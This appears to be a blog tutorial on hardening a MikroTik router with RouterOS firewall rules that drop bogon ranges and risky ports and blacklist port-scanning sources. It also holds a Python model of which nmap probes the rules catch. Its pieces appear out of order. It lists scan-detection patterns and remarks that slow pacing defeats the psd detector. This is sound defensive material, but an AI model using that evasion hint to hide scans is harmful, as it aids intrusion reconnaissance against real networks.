/ip firewall filter add chain=input protocol=tcp tcp-flags=fin,syn,rst,psh,ack,urg action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w comment="ALL/ALL scan"
/ip firewall filter add chain=input protocol=tcp tcp-flags=!fin,!syn,!rst,!psh,!ack,!urg action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w comment="NMAP NULL scan"

# block the attackers' IPs

/ip firewall filter add chain=input src-address-list="port scanners" action=drop comment="dropping port scanners" disabled=no

#---------- end
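To see exactly which probes the rule set above catches and which slip past it, the following added example (not RouterOS code) models the two matchers involved: the tcp-flags match, where a listed flag must be set, a !flag must be clear and unlisted flags are ignored, and the psd detector, where distinct destination ports from one source within DelayThreshold of each other accumulate weight (3 per privileged port, 1 per high port) until WeightThreshold 21. The psd bookkeeping follows the documented parameters but is an approximation, not MikroTik's implementation; the packets and probe sequences are constructed.

```python
"""What the port-scan rules above actually match.

Added example, not RouterOS code. Models the tcp-flags matcher and an
approximation of psd=21,3s,3,1; packets and probe sequences are constructed.
"""
from typing import Iterable, List, Set, Tuple

FLAGS = {"fin", "syn", "rst", "psh", "ack", "urg"}

# The tcp-flags rules from the script above, in order, with their comments.
RULES = [
    ("fin,!syn,!rst,!psh,!ack,!urg", "NMAP FIN Stealth scan"),
    ("fin,syn", "SYN/FIN scan"),
    ("syn,rst", "SYN/RST scan"),
    ("fin,psh,urg,!syn,!rst,!ack", "FIN/PSH/URG scan"),
    ("fin,syn,rst,psh,ack,urg", "ALL/ALL scan"),
    ("!fin,!syn,!rst,!psh,!ack,!urg", "NMAP NULL scan"),
]

def parse_tcp_flags(spec: str) -> Tuple[Set[str], Set[str]]:
    """Split a RouterOS tcp-flags value into (must be set, must be clear)."""
    must_set, must_clear = set(), set()
    for tok in spec.lower().split(","):
        tok = tok.strip()
        (must_clear if tok.startswith("!") else must_set).add(tok.lstrip("!"))
    unknown = (must_set | must_clear) - FLAGS
    if unknown:
        raise ValueError(f"unknown TCP flag(s): {sorted(unknown)}")
    return must_set, must_clear

def tcp_flags_match(spec: str, flags: Set[str]) -> bool:
    """True when the packet's flag set satisfies the matcher; other flags are ignored."""
    must_set, must_clear = parse_tcp_flags(spec)
    return must_set <= flags and not (must_clear & flags)

def classify(flags: Set[str]) -> List[str]:
    """Comments of every rule a packet with these flags would hit."""
    return [comment for spec, comment in RULES if tcp_flags_match(spec, flags)]

def psd_fires(hits: Iterable[Tuple[float, int]], weight_threshold: int = 21,
              delay_threshold: float = 3.0, low_weight: int = 3,
              high_weight: int = 1) -> bool:
    """Approximate psd=21,3s,3,1 for one source: hits are (seconds, dst_port).
    A gap longer than delay_threshold starts a new sequence; each new port in
    the sequence adds its weight; fire when the total reaches the threshold."""
    seen: Set[int] = set()
    weight, last_t = 0, None
    for t, port in sorted(hits):
        if last_t is not None and t - last_t > delay_threshold:
            seen, weight = set(), 0                  # sequence broken, start over
        last_t = t
        if port not in seen:
            seen.add(port)
            weight += low_weight if port <= 1024 else high_weight
            if weight >= weight_threshold:
                return True
    return False

# Constructed probes: the flag sets nmap -sS/-sF/-sN/-sX/-sA send.
SAMPLE_PACKETS = {
    "normal SYN (-sS / any client)": {"syn"},
    "normal data segment": {"psh", "ack"},
    "FIN scan (-sF)": {"fin"},
    "NULL scan (-sN)": set(),
    "Xmas scan (-sX)": {"fin", "psh", "urg"},
    "SYN/FIN probe": {"syn", "fin"},
    "ACK scan (-sA)": {"ack"},
}

if __name__ == "__main__":
    for name, flags in SAMPLE_PACKETS.items():
        print(f"{name:32} -> {classify(flags) or ['passes the tcp-flags rules']}")
    fast_sweep = [(0.1 * i, 20 + i) for i in range(10)]   # 10 low ports inside 1 s
    slow_sweep = [(5.0 * i, 20 + i) for i in range(10)]   # same ports, 5 s apart
    print("psd fires on fast sweep:", psd_fires(fast_sweep))
    print("psd fires on slow sweep:", psd_fires(slow_sweep))
```

The classification shows the division of labour: the tcp-flags rules only catch malformed probes (FIN, NULL, Xmas, SYN/FIN), while a plain SYN scan or an ACK scan looks like legitimate traffic packet by packet and is caught only by psd, and psd in turn is defeated by pacing the probes more than 3 seconds apart.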

Selamat mencoba ;)

MikroTik Security

From a module I was given, here are the commands for protecting a MikroTik router by blocking certain IP ranges and ports.


The command lines:

/ip firewall filter add chain=forward src-address=0.0.0.0/8 action=drop comment="deny 'this network' range"
/ip firewall filter add chain=forward dst-address=0.0.0.0/8 action=drop comment="deny 'this network' range"
/ip firewall filter add chain=forward src-address=127.0.0.0/8 action=drop comment="deny loopback"
/ip firewall filter add chain=forward dst-address=127.0.0.0/8 action=drop comment="deny loopback"
/ip firewall filter add chain=forward src-address=224.0.0.0/4 action=drop comment="deny multicast (the whole 224.0.0.0/4, not just /8)"
/ip firewall filter add chain=forward dst-address=224.0.0.0/4 action=drop comment="deny multicast (the whole 224.0.0.0/4, not just /8)"

/ip firewall filter add chain=forward protocol=tcp action=jump jump-target=tcp
/ip firewall filter add chain=forward protocol=udp action=jump jump-target=udp
/ip firewall filter add chain=forward protocol=icmp action=jump jump-target=icmp

/ip firewall filter add chain=udp protocol=udp dst-port=69 action=drop comment="deny TFTP"
/ip firewall filter add chain=udp protocol=udp dst-port=111 action=drop comment="deny RPC portmapper"
/ip firewall filter add chain=udp protocol=udp dst-port=135 action=drop comment="deny MS RPC endpoint mapper"
/ip firewall filter add chain=udp protocol=udp dst-port=137-139 action=drop comment="deny NBT"
/ip firewall filter add chain=udp protocol=udp dst-port=2049 action=drop comment="deny NFS"
/ip firewall filter add chain=udp protocol=udp dst-port=31337 action=drop comment="deny BackOrifice (default port 31337; the module had 3133)"

/ip firewall filter add chain=input protocol=tcp psd=21,3s,3,1 action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w comment="port scanners to list" disabled=no

Note that the module jumps to the tcp and icmp chains but defines no rules in them, so packets sent there fall straight back into the forward chain; add rules to those chains before relying on them. More detail will perhaps come in another article. :D

thanks

 